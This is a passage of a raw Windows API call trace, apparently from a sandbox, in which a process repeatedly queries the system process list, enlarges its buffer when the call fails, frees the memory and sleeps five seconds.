[0229.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0229.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0229.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0229.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.606] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0229.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0229.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0229.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0229.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0229.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0229.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.713] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0229.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0229.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0229.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0229.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0229.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0229.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.845] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0229.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0229.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0229.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0229.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0229.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0229.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.962] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0229.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0229.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0229.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0229.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0229.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0230.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.075] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0230.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0230.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0230.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0230.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0230.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0230.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.274] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0230.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0230.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0230.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0230.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0230.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0230.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.449] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0230.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0230.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0230.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0230.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0230.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0230.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.594] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0230.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0230.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0230.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0230.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0230.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0230.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.743] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0230.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0230.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0230.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0230.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0230.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0231.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.086] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0231.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0231.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0231.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0231.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0231.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0231.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.476] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0231.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0231.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0231.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0231.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0231.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0231.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.669] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0231.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0231.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0231.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0231.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0231.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0231.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.813] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0231.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0231.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0231.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0231.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0231.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0231.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.944] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0231.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0231.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0231.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0231.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0231.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0232.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.062] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0232.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0232.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0232.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0232.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0232.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0232.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.182] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0232.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0232.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0232.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0232.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0232.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0232.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.306] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0232.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0232.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0232.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0232.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0232.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0232.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.440] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0232.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0232.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0232.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0232.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0232.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0232.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.547] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0232.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0232.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0232.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0232.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0232.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0232.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.689] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0232.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0232.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0232.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0232.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0232.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0232.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.799] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0232.801] 